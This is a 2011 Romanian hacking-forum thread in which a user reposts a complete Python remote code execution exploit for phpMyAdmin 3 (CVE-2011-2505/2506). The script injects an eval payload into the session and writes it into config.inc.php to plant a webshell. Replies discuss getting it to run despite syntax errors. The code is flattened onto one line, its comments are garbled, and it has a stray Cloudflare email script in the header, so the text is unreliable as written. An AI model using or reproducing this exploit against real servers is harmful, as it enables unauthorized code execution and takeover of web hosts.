Nytro Posted July 8, 2011 Report Posted July 8, 2011 phpMyAdmin3 (pma3) Remote Code Execution Exploit#!/usr/bin/env python# coding=utf-8# pma3 - phpMyAdmin3 remote code execute exploit# Author: wofeiwo<wofeiwo@80sec.com<script type="text/javascript">/* <![CDATA[ */(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();/* ]]> */</script>># Thx Superhei# Tested on: 3.1.1, 3.2.1, 3.4.3# CVE: CVE-2011-2505, CVE-2011-2506# Date: 2011-07-08# Have fun, DO *NOT* USE IT TO DO BAD THING.################################################# Requirements: 1. "config" directory must created&writeable in pma directory.# 2. session.auto_start = 1 in php.ini configuration.import os,sys,urllib2,redef usage(program): print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote codeexecute exploit" print "Usage: %s <PMA_url>" % program print "Example: %s http://www.test.com/phpMyAdmin" % program sys.exit(0)def main(args): try: if len(args) < 2: usage(args[0]) if args[1][-1] == "/": args[1] = args[1][:-1] # ??????????token??sessionid??sessionid??phpMyAdmin???????µ? print "[+] Trying get form token&session_id.." content = urllib2.urlopen(args[1]+"/index.php").read() r1 = re.findall("token=(\w{32})", content) r2 = re.findall("phpMyAdmin=(\w{32,40})", content) if not r1: r1 = re.findall("token\" value=\"(\w{32})\"", content) if not r2: r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content) if len(r1) < 1 or len(r2) < 1: print "[-] Cannot find form token and session id...exit." sys.exit(-1) token = r1[0] sessionid = r2[0] print "[+] Token: %s , SessionID: %s" % (token, sessionid) # ??????????swekey.auth.lib.php????$_SESSION??? print "[+] Trying to insert payload in $_SESSION.." uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA" url = args[1]+uri opener = urllib2.build_opener() opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %(sessionid, sessionid))) urllib2.install_opener(opener) urllib2.urlopen(url) # ????setup???shell print "[+] Trying get webshell.." postdata ="phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"% (sessionid, token) url = args[1]+"/setup/config.php" # print "[+]Postdata: %s" % postdata urllib2.urlopen(url, postdata) print "[+] All done, pray for your lucky!" # ??????????????shell url = args[1]+"/config/config.inc.php" opener.addheaders.append(('Code', 'phpinfo();')) urllib2.install_opener(opener) print "[+] Trying connect shell: %s" % url result = re.findall("System \</td\>\<tdclass=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read()) if len(result) == 1: print "[+] Lucky u! System info: %s" % result[0] print "[+] Shellcode is: eval(getenv('HTTP_CODE'));" else: print "[-] Cannot get webshell." except Exception, e: print eif __name__ == "__main__" : main(sys.argv)Nu l-am incercat, pe cine intereseaza sa incerce.Sursa: phpMyAdmin3 (pma3) Remote Code Execution Exploit Quote
xaren Posted July 8, 2011 Report Posted July 8, 2011 L-am incercat acum 20 minute dar da erori de sintaxa Quote
Zatarra Posted July 9, 2011 Report Posted July 9, 2011 L-am incercat acum 20 minute dar da erori de sintaxa Iti da erori de sintaxa deoarece nu e aranjat bine. Rearanjeaza`l si apoi ruleaza`l. Python e foarte strict cand vine vorba de sintaxa. Imi place la nebunie treaba asta deoarece doar cei care cunosc codul stiu sa`l foloseasca. Daca bagi 5-10 tab`uri in cod se pierd toti skizzi.On: Nytro stiam de el, am sa`l probez zilele astea. Quote
xaren Posted July 9, 2011 Report Posted July 9, 2011 Daca bagi 5-10 tab`uri in cod se pierd toti skizzi. Te referi la mine ? Quote
